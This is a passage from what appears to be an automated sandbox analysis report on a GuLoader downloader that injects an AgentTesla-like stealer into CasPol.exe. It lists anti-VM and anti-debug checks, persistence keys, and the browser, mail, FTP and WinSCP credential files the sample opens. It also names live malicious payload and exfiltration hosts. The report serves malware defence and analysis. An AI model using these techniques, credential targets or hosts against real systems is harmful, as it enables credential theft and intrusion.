          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeAPI call chain: ExitProcess graph end node
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052117582.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03251B34 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258525 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325EF5D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325D9AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_0325DF99 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258BC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03255004 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258C4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258CB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258C90 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258CE4 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258CE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258AE0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258AEC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_03258CEC mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_011437F8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B10000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		1
          Credentials in Registry          		117
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)111
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager331
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)1
          Registry Run Keys / Startup Folder          		241
          Virtualization/Sandbox Evasion          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets241
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size Limits122
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common111
          Process Injection          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe22%VirustotalBrowse
          SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe7%ReversingLabsWin32.Downloader.GuLoader

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll3%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://mail.paralikgroup.com0%Avira URL Cloudsafe
          http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin0%Avira URL Cloudsafe
          http://ckatRU.com0%Avira URL Cloudsafe
          https://8tHZzAc0TjNm.org0%Avira URL Cloudsafe
          https://8tHZzAc0TjNm.orgt-Wl0%Avira URL Cloudsafe
          https://8tHZzAc0TjNm.orgx0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          artist151sh.com
          		50.7.115.119
          		truetrue
            		unknown
            mail.paralikgroup.com
            		173.254.28.216
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bintrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://creativecommons.org/ns#DerivativeWorksSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                		high
                http://127.0.0.1:HTTP/1.1CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://DynDns.comDynDNSCasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://creativecommons.org/licenses/by-sa/4.0/user-not-tracked-symbolic.svg.1.drfalse
                  		high
                  http://creativecommons.org/ns#DistributionSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                    		high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://mail.paralikgroup.comCasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://creativecommons.org/ns#AttributionSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                      		high
                      https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://creativecommons.org/ns#ShareAlikeSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                          		high
                          http://ckatRU.comCasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://8tHZzAc0TjNm.orgCasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.drfalse
                            		high
                            http://creativecommons.org/ns#NoticeSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                              		high
                              http://creativecommons.org/ns#ReproductionSecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                                		high
                                https://8tHZzAc0TjNm.orgt-WlCasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://8tHZzAc0TjNm.orgxCasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://creativecommons.org/ns#SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  50.7.115.119
                                  		artist151sh.comUnited States
                                  		174COGENT-174UStrue
                                  173.254.28.216
                                  		mail.paralikgroup.comUnited States
                                  		46606UNIFIEDLAYER-AS-1UStrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:635379
                                  Start date and time: 27/05/202220:54:202022-05-27 20:54:20 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@4/13@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 36.8% (good quality ratio 36.3%)
                                  • Quality average: 87.9%
                                  • Quality standard deviation: 21.1%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 51.124.57.242, 20.93.58.141
                                  • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  20:56:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe
                                  20:56:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe
                                  20:56:50API Interceptor2728x Sleep call for process: CasPol.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\CYKELPARKERINGENS.ini

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):43
                                  Entropy (8bit):4.693479289485192
                                  Encrypted:false
                                  SSDEEP:3:JODb6MHIymy32ov:Jebozyn
                                  MD5:8B36E2227A5BD0472C64194B43581D90
                                  SHA1:E391FCABCE78C902A95B2B3A90F46380AA0E6031
                                  SHA-256:7A5D1B27408729909236B8B98CD3D19002750B7297981F32A6E6DD743B16BFB4
                                  SHA-512:FE426325981C65C37C16AE8021B2D8EDB50009743DC54C3EA2F496CA020BB980BCC43D70F5A2498A2AB8315183F5D2437DB72CCE69698978D927FA0E25DB1375
                                  Malicious:false
